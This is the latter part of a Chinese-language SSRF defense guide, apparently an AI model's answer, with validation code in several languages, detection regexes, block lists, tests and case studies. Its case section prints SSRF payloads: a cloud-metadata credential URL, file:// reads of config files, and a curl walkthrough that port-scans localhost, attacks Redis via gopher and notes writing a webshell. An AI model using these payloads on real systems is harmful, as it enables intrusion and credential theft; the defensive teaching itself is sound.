if hostname == allowed_domain:
is_allowed = True
break

if not is_allowed:
raise ValueError(f"域名不在白名单中: {hostname}")

def _validate_port(self, parsed):
"""验证端口"""
port = parsed.port
if port is None:
port = 80 if parsed.scheme == 'http' else 443

if port not in self.allowed_ports:
raise ValueError(f"不允许的端口: {port}")

def _validate_ip(self, hostname):
"""验证IP地址(多次解析防止DNS重绑定)"""
resolved_ips = []

for _ in range(3):
try:
ip_str = socket.gethostbyname(hostname)
resolved_ips.append(ip_str)

ip_obj = ipaddress.ip_address(ip_str)

# 检查是否在黑名单IP段
for blocked_range in self.blocked_ip_ranges:
if ip_obj in blocked_range:
raise ValueError(f"禁止访问的IP地址: {ip_str}")

# 检查特殊IP
if ip_obj.is_private or ip_obj.is_loopback or ip_obj.is_link_local:
raise ValueError(f"禁止访问内网地址: {ip_str}")

time.sleep(0.3)

except socket.gaierror:
raise ValueError(f"无法解析域名: {hostname}")

# 验证DNS解析一致性
if len(set(resolved_ips)) > 1:
raise ValueError(f"检测到DNS重绑定攻击: {resolved_ips}")

def safe_request(self, url, method='GET', **kwargs):
"""安全的HTTP请求"""
# 验证URL
self.validate_url(url)

# 设置安全参数
safe_kwargs = {
'timeout': self.timeout,
'allow_redirects': False,
'stream': True,
**kwargs
}

# 发起请求
if method.upper() == 'GET':
response = requests.get(url, **safe_kwargs)
elif method.upper() == 'POST':
response = requests.post(url, **safe_kwargs)
else:
raise ValueError(f"不支持的HTTP方法: {method}")

# 验证响应
self._validate_response(response)

# 读取内容(带大小限制)
content = self._read_response_safely(response)

return content

def _validate_response(self, response):
"""验证响应"""
# 验证Content-Type
content_type = response.headers.get('Content-Type', '')
if not any(ct in content_type for ct in self.allowed_content_types):
raise ValueError(f"不允许的内容类型: {content_type}")

def _read_response_safely(self, response):
"""安全读取响应内容"""
content = b''
for chunk in response.iter_content(chunk_size=8192):
content += chunk
if len(content) > self.max_response_size:
raise ValueError("响应内容过大")
return content


# 使用示例
protection = SSRFProtection()

@app.route('/fetch')
def fetch_url():
url = request.args.get('url')

if not url:
return "缺少URL参数", 400

try:
content = protection.safe_request(url)
return content
except ValueError as e:
app.logger.warning(f"SSRF攻击尝试: {url} - {str(e)}")
return f"请求被拒绝: {str(e)}", 403
except Exception as e:
app.logger.error(f"请求错误: {str(e)}")
return "请求失败", 500


# Flask装饰器形式
def ssrf_protected(f):
"""SSRF防护装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
url = request.args.get('url') or request.form.get('url')

if url:
try:
protection.validate_url(url)
except ValueError as e:
return f"URL验证失败: {str(e)}", 403

return f(*args, **kwargs)

return decorated_function


@app.route('/proxy')
@ssrf_protected
def proxy_request():
url = request.args.get('url')
content = protection.safe_request(url)
return content

七、特殊场景防护

7.1 文件上传场景

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def validate_uploaded_file_url(file_url):
"""
验证用户上传的图片URL
常见于头像、文章配图等功能
"""
# 1. 基础URL验证
protection = SSRFProtection()
protection.validate_url(file_url)

# 2. 下载文件
response = requests.get(file_url, timeout=10, stream=True)

# 3. 验证文件类型(Magic Number)
import magic
mime = magic.from_buffer(response.content[:1024], mime=True)

allowed_mimes = ['image/jpeg', 'image/png', 'image/gif']
if mime not in allowed_mimes:
raise ValueError(f"不允许的文件类型: {mime}")

# 4. 验证文件大小
max_size = 5 * 1024 * 1024 # 5MB
content_length = int(response.headers.get('Content-Length', 0))
if content_length > max_size:
raise ValueError("文件过大")

return response.content

7.2 Webhook回调场景

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
class WebhookProtection:
"""Webhook URL验证"""

def __init__(self):
self.allowed_domains = [
'hooks.slack.com',
'discord.com',
'api.telegram.org',
]

def validate_webhook_url(self, url):
"""验证Webhook URL"""
parsed = urlparse(url)

# 必须是HTTPS
if parsed.scheme != 'https':
raise ValueError("Webhook必须使用HTTPS")

# 域名白名单
hostname = parsed.hostname
is_allowed = any(
hostname == domain or hostname.endswith('.' + domain)
for domain in self.allowed_domains
)

if not is_allowed:
raise ValueError(f"不支持的Webhook域名: {hostname}")

return True

def send_webhook(self, url, data):
"""发送Webhook"""
self.validate_webhook_url(url)

response = requests.post(
url,
json=data,
timeout=10,
allow_redirects=False
)

return response


# 使用示例
webhook = WebhookProtection()

@app.route('/configure_webhook', methods=['POST'])
def configure_webhook():
webhook_url = request.json.get('webhook_url')

try:
webhook.validate_webhook_url(webhook_url)
# 保存到数据库
save_webhook_config(webhook_url)
return {"status": "success"}
except ValueError as e:
return {"error": str(e)}, 400

7.3 PDF/文档生成场景

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
def safe_html_to_pdf(html_content, external_resources=False):
"""
安全地将HTML转换为PDF
防止HTML中包含恶意URL
"""
if not external_resources:
# 移除所有外部资源引用
from bs4 import BeautifulSoup

soup = BeautifulSoup(html_content, 'html.parser')

# 移除外部资源标签
for tag in soup.find_all(['img', 'script', 'link', 'iframe']):
tag.decompose()

html_content = str(soup)

# 使用wkhtmltopdf时禁用外部访问
import pdfkit

options = {
'enable-local-file-access': False,
'disable-external-links': True,
'disable-javascript': True,
}

pdf = pdfkit.from_string(html_content, False, options=options)
return pdf

7.4 API代理场景

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
class APIProxyProtection:
"""API代理防护"""

def __init__(self):
# 定义允许代理的API列表
self.allowed_apis = {
'github': {
'base_url': 'https://api.github.com',
'paths': ['/users/', '/repos/'],
},
'weather': {
'base_url': 'https://api.openweathermap.org',
'paths': ['/data/2.5/weather'],
}
}

def proxy_request(self, api_name, path, params=None):
"""代理API请求"""
if api_name not in self.allowed_apis:
raise ValueError(f"不支持的API: {api_name}")

api_config = self.allowed_apis[api_name]
base_url = api_config['base_url']
allowed_paths = api_config['paths']

# 验证路径
if not any(path.startswith(allowed_path) for allowed_path in allowed_paths):
raise ValueError(f"不允许的API路径: {path}")

# 构造完整URL
full_url = base_url + path

# 发起请求
response = requests.get(
full_url,
params=params,
timeout=10
)

return response.json()


# 使用示例
api_proxy = APIProxyProtection()

@app.route('/api/proxy/<api_name>')
def proxy_api(api_name):
path = request.args.get('path')
params = request.args.to_dict()
params.pop('path', None)

try:
result = api_proxy.proxy_request(api_name, path, params)
return jsonify(result)
except ValueError as e:
return {"error": str(e)}, 403

八、监控与日志

8.1 SSRF攻击检测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
import logging
from datetime import datetime

class SSRFDetector:
"""SSRF攻击检测器"""

def __init__(self):
self.logger = logging.getLogger('ssrf_detector')
self.suspicious_patterns = [
r'127\.0\.0\.1',
r'localhost',
r'169\.254\.169\.254',
r'metadata',
r'0\.0\.0\.0',
r'192\.168\.',
r'10\.\d+\.\d+\.\d+',
r'172\.(1[6-9]|2[0-9]|3[01])\.',
r'file://',
r'gopher://',
r'dict://',
]

def log_request(self, url, user_ip, user_id=None):
"""记录请求"""
import re

is_suspicious = any(
re.search(pattern, url, re.IGNORECASE)
for pattern in self.suspicious_patterns
)

log_data = {
'timestamp': datetime.utcnow().isoformat(),
'url': url,
'user_ip': user_ip,
'user_id': user_id,
'suspicious': is_suspicious,
}

if is_suspicious:
self.logger.warning(f"可疑SSRF尝试: {log_data}")
# 可以触发告警
self.alert_security_team(log_data)
else:
self.logger.info(f"URL请求: {log_data}")

def alert_security_team(self, log_data):
"""告警通知"""
# 发送到SIEM系统、Slack、邮件等
pass


# 集成到应用中
detector = SSRFDetector()

@app.before_request
def log_ssrf_attempts():
url = request.args.get('url') or request.form.get('url')
if url:
detector.log_request(
url=url,
user_ip=request.remote_addr,
user_id=getattr(current_user, 'id', None)
)

8.2 实时监控

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from prometheus_client import Counter, Histogram

# Prometheus指标
ssrf_attempts = Counter(
'ssrf_attempts_total',
'Total SSRF attempts',
['status', 'reason']
)

ssrf_request_duration = Histogram(
'ssrf_request_duration_seconds',
'SSRF request duration'
)

@app.route('/fetch')
def fetch_url():
url = request.args.get('url')

with ssrf_request_duration.time():
try:
protection.validate_url(url)
content = protection.safe_request(url)
ssrf_attempts.labels(status='allowed', reason='valid').inc()
return content
except ValueError as e:
ssrf_attempts.labels(status='blocked', reason=str(e)).inc()
return str(e), 403

九、总结与最佳实践

9.1 防护优先级

1
2
3
4
5
6
7
8
9
10
11
1. 【最高优先级】使用域名白名单

2. 【高优先级】禁止访问内网IP

3. 【高优先级】限制协议为HTTP/HTTPS

4. 【中优先级】DNS重绑定防护

5. 【中优先级】限制端口、重定向、超时

6. 【辅助】网络层隔离、监控告警

9.2 核心防护原则

输入验证三原则:

  1. 白名单优于黑名单 - 明确允许的资源
  2. 多层验证 - 协议、域名、IP、端口
  3. 动态验证 - DNS重绑定防护

请求控制三原则:

  1. 最小权限 - 仅允许必要的访问
  2. 超时限制 - 防止资源耗尽
  3. 大小限制 - 防止DoS攻击

监控响应三原则:

  1. 记录所有请求 - 便于审计
  2. 实时告警 - 快速响应
  3. 定期审查 - 持续改进

9.3 开发建议

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
开发阶段:
□ 使用成熟的HTTP客户端库
□ 默认禁用不安全的协议
□ 实现完整的输入验证
□ 编写安全测试用例

部署阶段:
□ 使用网络隔离(VPC、Subnet)
□ 配置防火墙规则
□ 启用云服务元数据保护
□ 部署WAF规则

运维阶段:
□ 监控异常请求
□ 定期安全审计
□ 及时更新依赖
□及时应用安全补丁
□ 进行渗透测试

9.4 不同语言/框架的防护实现

Java/Spring Boot

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77

```java
import org.springframework.web.bind.annotation.*;
import java.net.*;
import java.util.*;

@RestController
public class SafeProxyController {

private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");
private static final Set<Integer> ALLOWED_PORTS = Set.of(80, 443, 8080);
private static final Set<String> BLOCKED_HOSTS = Set.of(
"localhost", "127.0.0.1", "169.254.169.254"
);

@GetMapping("/fetch")
public ResponseEntity<String> fetchUrl(@RequestParam String url) {
try {
validateUrl(url);

// 使用RestTemplate或HttpClient
RestTemplate restTemplate = new RestTemplate();
restTemplate.setRequestFactory(createSecureRequestFactory());

String result = restTemplate.getForObject(url, String.class);
return ResponseEntity.ok(result);

} catch (SecurityException e) {
return ResponseEntity.status(HttpStatus.FORBIDDEN)
.body("安全验证失败: " + e.getMessage());
} catch (Exception e) {
return ResponseEntity.status(HttpStatus.BAD_REQUEST)
.body("请求失败: " + e.getMessage());
}
}

private void validateUrl(String urlString) throws SecurityException {
try {
URL url = new URL(urlString);

// 验证协议
if (!ALLOWED_SCHEMES.contains(url.getProtocol().toLowerCase())) {
throw new SecurityException("不允许的协议: " + url.getProtocol());
}

// 验证主机名
String host = url.getHost();
if (BLOCKED_HOSTS.contains(host.toLowerCase())) {
throw new SecurityException("禁止访问的主机: " + host);
}

// 解析IP并验证
InetAddress address = InetAddress.getByName(host);
if (address.isLoopbackAddress() ||
address.isLinkLocalAddress() ||
address.isSiteLocalAddress()) {
throw new SecurityException("禁止访问内网地址");
}

// 验证端口
int port = url.getPort() == -1 ? url.getDefaultPort() : url.getPort();
if (!ALLOWED_PORTS.contains(port)) {
throw new SecurityException("不允许的端口: " + port);
}

} catch (MalformedURLException | UnknownHostException e) {
throw new SecurityException("无效的URL", e);
}
}

private ClientHttpRequestFactory createSecureRequestFactory() {
SimpleClientHttpRequestFactory factory = new SimpleClientHttpRequestFactory();
factory.setConnectTimeout(3000);
factory.setReadTimeout(10000);
return factory;
}
}

PHP/Laravel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Http;
use Illuminate\Support\Facades\Validator;

class SafeProxyController extends Controller
{
private $allowedSchemes = ['http', 'https'];
private $allowedPorts = [80, 443, 8080];
private $blockedIpRanges = [
'127.0.0.0/8',
'10.0.0.0/8',
'172.16.0.0/12',
'192.168.0.0/16',
'169.254.0.0/16',
];

public function fetch(Request $request)
{
$url = $request->input('url');

// 验证URL
$validator = Validator::make($request->all(), [
'url' => 'required|url'
]);

if ($validator->fails()) {
return response()->json(['error' => 'Invalid URL'], 400);
}

try {
$this->validateUrlSafety($url);

// 发起安全请求
$response = Http::timeout(10)
->withOptions([
'allow_redirects' => false,
'verify' => true,
])
->get($url);

return response($response->body())
->header('Content-Type', 'text/plain');

} catch (\Exception $e) {
return response()->json([
'error' => '请求被拒绝: ' . $e->getMessage()
], 403);
}
}

private function validateUrlSafety($url)
{
$parsed = parse_url($url);

// 验证协议
if (!in_array(strtolower($parsed['scheme']), $this->allowedSchemes)) {
throw new \Exception('不允许的协议');
}

// 验证主机名
$host = $parsed['host'];
$ip = gethostbyname($host);

// 检查是否为内网IP
if ($this->isPrivateIp($ip)) {
throw new \Exception('禁止访问内网地址');
}

// 验证端口
$port = $parsed['port'] ?? ($parsed['scheme'] === 'https' ? 443 : 80);
if (!in_array($port, $this->allowedPorts)) {
throw new \Exception('不允许的端口');
}
}

private function isPrivateIp($ip)
{
// 检查是否为内网IP
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
return true;
}

// 额外检查元数据地址
if ($ip === '169.254.169.254') {
return true;
}

return false;
}
}

Node.js/Express

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
const express = require('express');
const axios = require('axios');
const { URL } = require('url');
const dns = require('dns').promises;
const ipaddr = require('ipaddr.js');

const app = express();

const ALLOWED_SCHEMES = ['http:', 'https:'];
const ALLOWED_PORTS = [80, 443, 8080];

// SSRF防护中间件
async function ssrfProtection(req, res, next) {
const targetUrl = req.query.url || req.body.url;

if (!targetUrl) {
return res.status(400).json({ error: '缺少URL参数' });
}

try {
await validateUrl(targetUrl);
req.validatedUrl = targetUrl;
next();
} catch (error) {
return res.status(403).json({
error: '安全验证失败',
message: error.message
});
}
}

async function validateUrl(urlString) {
// 解析URL
let parsedUrl;
try {
parsedUrl = new URL(urlString);
} catch (error) {
throw new Error('无效的URL格式');
}

// 验证协议
if (!ALLOWED_SCHEMES.includes(parsedUrl.protocol)) {
throw new Error(`不允许的协议: ${parsedUrl.protocol}`);
}

// 验证端口
const port = parsedUrl.port || (parsedUrl.protocol === 'https:' ? 443 : 80);
if (!ALLOWED_PORTS.includes(parseInt(port))) {
throw new Error(`不允许的端口: ${port}`);
}

// DNS解析
const hostname = parsedUrl.hostname;
let addresses;

try {
addresses = await dns.resolve4(hostname);
} catch (error) {
throw new Error(`无法解析域名: ${hostname}`);
}

// 验证所有解析的IP
for (const address of addresses) {
if (isPrivateIp(address)) {
throw new Error(`禁止访问内网地址: ${address}`);
}
}

// 二次解析验证(防DNS重绑定)
await new Promise(resolve => setTimeout(resolve, 300));
const secondResolve = await dns.resolve4(hostname);

if (JSON.stringify(addresses.sort()) !== JSON.stringify(secondResolve.sort())) {
throw new Error('检测到DNS重绑定攻击');
}
}

function isPrivateIp(ip) {
try {
const addr = ipaddr.parse(ip);

// 检查是否为私有IP
const range = addr.range();
const privateRanges = [
'private', 'loopback', 'linkLocal',
'carrierGradeNat', 'reserved'
];

if (privateRanges.includes(range)) {
return true;
}

// 特殊检查云元数据地址
if (ip === '169.254.169.254') {
return true;
}

return false;
} catch (error) {
return true; // 解析失败时默认拒绝
}
}

// 安全的代理端点
app.get('/fetch', ssrfProtection, async (req, res) => {
try {
const response = await axios.get(req.validatedUrl, {
timeout: 10000,
maxRedirects: 0,
maxContentLength: 10 * 1024 * 1024, // 10MB
validateStatus: (status) => status < 400,
});

res.send(response.data);
} catch (error) {
res.status(500).json({
error: '请求失败',
message: error.message
});
}
});

// 错误处理
app.use((error, req, res, next) => {
console.error('Error:', error);
res.status(500).json({ error: '服务器错误' });
});

app.listen(3000, () => {
console.log('Server running on port 3000');
});

Go

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
package main

import (
"context"
"fmt"
"io"
"net"
"net/http"
"net/url"
"strings"
"time"
)

type SSRFProtector struct {
AllowedSchemes []string
AllowedPorts []int
Timeout time.Duration
MaxBodySize int64
}

func NewSSRFProtector() *SSRFProtector {
return &SSRFProtector{
AllowedSchemes: []string{"http", "https"},
AllowedPorts: []int{80, 443, 8080},
Timeout: 10 * time.Second,
MaxBodySize: 10 * 1024 * 1024, // 10MB
}
}

func (p *SSRFProtector) ValidateURL(urlStr string) error {
// 解析URL
parsedURL, err := url.Parse(urlStr)
if err != nil {
return fmt.Errorf("无效的URL: %v", err)
}

// 验证协议
schemeAllowed := false
for _, scheme := range p.AllowedSchemes {
if strings.ToLower(parsedURL.Scheme) == scheme {
schemeAllowed = true
break
}
}
if !schemeAllowed {
return fmt.Errorf("不允许的协议: %s", parsedURL.Scheme)
}

// 验证主机名
hostname := parsedURL.Hostname()
if hostname == "" {
return fmt.Errorf("无效的主机名")
}

// DNS解析
ips, err := net.LookupIP(hostname)
if err != nil {
return fmt.Errorf("无法解析域名: %v", err)
}

// 验证IP地址
for _, ip := range ips {
if isPrivateIP(ip) {
return fmt.Errorf("禁止访问内网地址: %s", ip.String())
}
}

// 验证端口
port := parsedURL.Port()
if port == "" {
if parsedURL.Scheme == "https" {
port = "443"
} else {
port = "80"
}
}

portAllowed := false
for _, allowedPort := range p.AllowedPorts {
if port == fmt.Sprintf("%d", allowedPort) {
portAllowed = true
break
}
}
if !portAllowed {
return fmt.Errorf("不允许的端口: %s", port)
}

return nil
}

func isPrivateIP(ip net.IP) bool {
// 检查是否为私有IP
if ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() {
return true
}

// 检查私有网段
privateIPBlocks := []*net.IPNet{
{IP: net.IPv4(10, 0, 0, 0), Mask: net.CIDRMask(8, 32)},
{IP: net.IPv4(172, 16, 0, 0), Mask: net.CIDRMask(12, 32)},
{IP: net.IPv4(192, 168, 0, 0), Mask: net.CIDRMask(16, 32)},
{IP: net.IPv4(169, 254, 0, 0), Mask: net.CIDRMask(16, 32)},
}

for _, block := range privateIPBlocks {
if block.Contains(ip) {
return true
}
}

// 检查云元数据地址
if ip.String() == "169.254.169.254" {
return true
}

return false
}

func (p *SSRFProtector) SafeRequest(urlStr string) ([]byte, error) {
// 验证URL
if err := p.ValidateURL(urlStr); err != nil {
return nil, err
}

// 创建HTTP客户端
client := &http.Client{
Timeout: p.Timeout,
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse // 禁止自动重定向
},
}

// 发起请求
ctx, cancel := context.WithTimeout(context.Background(), p.Timeout)
defer cancel()

req, err := http.NewRequestWithContext(ctx, "GET", urlStr, nil)
if err != nil {
return nil, err
}

resp, err := client.Do(req)
if err != nil {
return nil, err
}
defer resp.Body.Close()

// 限制读取大小
limitedReader := io.LimitReader(resp.Body, p.MaxBodySize)
body, err := io.ReadAll(limitedReader)
if err != nil {
return nil, err
}

return body, nil
}

// HTTP Handler
func fetchHandler(w http.ResponseWriter, r *http.Request) {
urlStr := r.URL.Query().Get("url")
if urlStr == "" {
http.Error(w, "缺少URL参数", http.StatusBadRequest)
return
}

protector := NewSSRFProtector()
body, err := protector.SafeRequest(urlStr)
if err != nil {
http.Error(w, fmt.Sprintf("请求失败: %v", err), http.StatusForbidden)
return
}

w.Write(body)
}

func main() {
http.HandleFunc("/fetch", fetchHandler)
fmt.Println("Server starting on :8080")
http.ListenAndServe(":8080", nil)
}

9.5 测试用例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
import unittest
from ssrf_protection import SSRFProtection

class TestSSRFProtection(unittest.TestCase):

def setUp(self):
self.protection = SSRFProtection()

def test_allow_valid_url(self):
"""测试允许合法URL"""
valid_urls = [
'http://example.com',
'https://api.example.com/endpoint',
'http://example.com:8080/path',
]
for url in valid_urls:
self.protection.validate_url(url) # 不应抛出异常

def test_block_localhost(self):
"""测试拦截localhost"""
blocked_urls = [
'http://127.0.0.1/',
'http://localhost/',
'http://0.0.0.0/',
'http://[::1]/',
]
for url in blocked_urls:
with self.assertRaises(ValueError):
self.protection.validate_url(url)

def test_block_private_ip(self):
"""测试拦截内网IP"""
blocked_urls = [
'http://192.168.1.1/',
'http://10.0.0.1/',
'http://172.16.0.1/',
]
for url in blocked_urls:
with self.assertRaises(ValueError):
self.protection.validate_url(url)

def test_block_metadata_service(self):
"""测试拦截云元数据地址"""
with self.assertRaises(ValueError):
self.protection.validate_url('http://169.254.169.254/')

def test_block_invalid_protocol(self):
"""测试拦截非法协议"""
invalid_protocols = [
'file:///etc/passwd',
'gopher://127.0.0.1:6379/',
'dict://127.0.0.1:6379/',
'ftp://internal-server/',
]
for url in invalid_protocols:
with self.assertRaises(ValueError):
self.protection.validate_url(url)

def test_block_invalid_port(self):
"""测试拦截非法端口"""
with self.assertRaises(ValueError):
self.protection.validate_url('http://example.com:6379/')

def test_bypass_attempts(self):
"""测试常见绕过尝试"""
bypass_attempts = [
'http://example.com@127.0.0.1/', # @符号绕过
'http://2130706433/', # 十进制IP
'http://0x7f000001/', # 十六进制IP
'http://127.1/', # 短格式IP
]
for url in bypass_attempts:
with self.assertRaises(ValueError):
self.protection.validate_url(url)

if __name__ == '__main__':
unittest.main()

9.6 安全检查清单

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
## 开发阶段检查清单

### URL验证
□ 是否实现协议白名单?
□ 是否禁止file、gopher、dict等协议?
□ 是否验证域名/IP地址?
□ 是否拦截内网IP段?
□ 是否拦截云元数据地址?
□ 是否限制访问端口?

### DNS安全
□ 是否进行多次DNS解析验证?
□ 是否检测DNS重绑定?
□ 是否使用可信DNS服务器?

### 请求安全
□ 是否设置请求超时?
□ 是否限制重定向次数?
□ 是否限制响应大小?
□ 是否禁用自动重定向?
□ 是否验证响应Content-Type?

### 代码审查
□ 是否使用白名单而非黑名单?
□ 是否有完整的异常处理?
□ 是否记录安全日志?
□ 是否有单元测试覆盖?

## 部署阶段检查清单

### 网络隔离
□ 是否部署在隔离网络?
□ 是否配置防火墙规则?
□ 是否限制出站连接?
□ 是否使用网络策略(K8s)?

### 云环境
□ 是否启用IMDSv2(AWS)?
□ 是否配置元数据访问限制?
□ 是否使用安全组限制?
□ 是否启用VPC端点?

### 监控告警
□ 是否记录所有URL请求?
□ 是否监控异常请求模式?
□ 是否配置实时告警?
□ 是否定期审查日志?

## 运维阶段检查清单

### 持续改进
□ 是否定期进行安全测试?
□ 是否及时更新依赖库?
□ 是否应用安全补丁?
□ 是否进行渗透测试?

### 应急响应
□ 是否有SSRF应急预案?
□ 是否定期演练?
□ 是否有回滚机制?
□ 是否有事件响应流程?

十、真实案例分析

10.1 Capital One数据泄露事件(2019)

背景:
攻击者利用SSRF漏洞访问AWS元数据服务,获取IAM凭证,最终导致1亿用户数据泄露。

攻击流程:

1
2
3
4
5
6
1. 发现Web应用防火墙(WAF)的SSRF漏洞
2. 构造请求访问元数据服务
http://169.254.169.254/latest/meta-data/iam/security-credentials/
3. 获取IAM角色临时凭证
4. 使用凭证访问S3存储桶
5. 下载敏感数据

防护建议:

  • 启用AWS IMDSv2
  • 实施最小权限原则
  • 限制IAM角色权限范围
  • 监控异常API调用

10.2 Uber服务器配置泄露(2016)

攻击向量:
通过SSRF漏洞读取内部服务器配置文件。

1
2
3
# 攻击payload
?url=file:///etc/nginx/nginx.conf
?url=file:///var/www/html/config.php

防护措施:

  • 禁止file协议
  • 敏感文件权限控制
  • 配置文件加密存储

10.3 实战渗透测试案例

场景:图片代理服务

1
2
3
4
5
6
# 存在漏洞的代码
@app.route('/proxy-image')
def proxy_image():
image_url = request.args.get('url')
response = requests.get(image_url)
return Response(response.content, mimetype='image/jpeg')

利用步骤:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 1. 端口扫描
for port in {22,80,443,3306,6379,9200}; do
curl "http://target.com/proxy-image?url=http://127.0.0.1:$port"
done

# 2. 发现Redis(6379)
curl "http://target.com/proxy-image?url=http://127.0.0.1:6379"
# 响应:-ERR wrong number of arguments for 'get' command

# 3. 使用Gopher协议攻击Redis
curl "http://target.com/proxy-image?url=gopher://127.0.0.1:6379/_..."

# 4. 写入WebShell
# 5. 获取服务器权限

十一、附录:工具与资源

11.1 安全测试工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
**自动化扫描工具:**
- SSRFmap: https://github.com/swisskyrepo/SSRFmap
- Gopherus: https://github.com/tarunkant/Gopherus
- SSRFTest: https://github.com/cujanovic/SSRF-Testing

**辅助工具:**
- Burp Suite Collaborator: DNS/HTTP外带
- DNSlog.cn: 中文DNSlog平台
- Ceye.io: DNS和HTTP监控
- Interactsh: 开源OOB平台

**本地测试环境:**
- DVWA: 包含SSRF练习
- WebGoat: OWASP教学项目
- VulnHub: 各种靶机环境

11.2 参考资料

1
2
3
4
5
6
7
8
9
10
11
12
13
14
**官方文档:**
- OWASP SSRF Prevention Cheat Sheet
- CWE-918: Server-Side Request Forgery
- PortSwigger Web Security Academy

**技术文章:**
- "A New Era of SSRF" by Orange Tsai
- "SSRF Bible" by Wallarm
- AWS Security Blog

**代码库:**
- Django: django.core.validators.URLValidator
- Spring: org.springframework.web.util.UriComponentsBuilder
- Express: validator.isURL()

11.3 快速参考

常见内网地址:

1
2
3
4
5
6
127.0.0.1/8      - 回环地址
10.0.0.0/8 - A类私有网络
172.16.0.0/12 - B类私有网络
192.168.0.0/16 - C类私有网络
169.254.0.0/16 - 链路本地地址
100.64.0.0/10 - 运营商NAT

云元数据地址:

1
2
3
4
169.254.169.254         - AWS/Azure/阿里云
metadata.google.internal - Google Cloud
100.100.100.200 - 阿里云(备用)
fd00:ec2::254 - AWS IPv6元数据

危险协议列表:

1
2
3
4
5
6
7
file://   - 读取本地文件
gopher:// - 构造任意TCP数据
dict:// - 字典服务器协议
ftp:// - FTP协议
sftp:// - SSH文件传输
ldap:// - LDAP目录服务
tftp:// - 简单文件传输

总结

SSRF是一种危害严重的Web安全漏洞,可能导致:

  • 内网信息泄露
  • 云凭证窃取
  • 内网服务攻击
  • 数据泄露

核心防护要点:

  1. 使用域名白名单(最有效)
  2. 禁止访问内网IP(基础防护)
  3. 限制协议为HTTP/HTTPS(协议控制)
  4. DNS重绑定防护(高级防护)
  5. 网络层隔离(深度防御)
  6. 监控与告警(持续改进)

希望这份超详细的SSRF漏洞讲解能帮助您全面理解和防护这一安全威胁!如有任何问题,欢迎继续提问。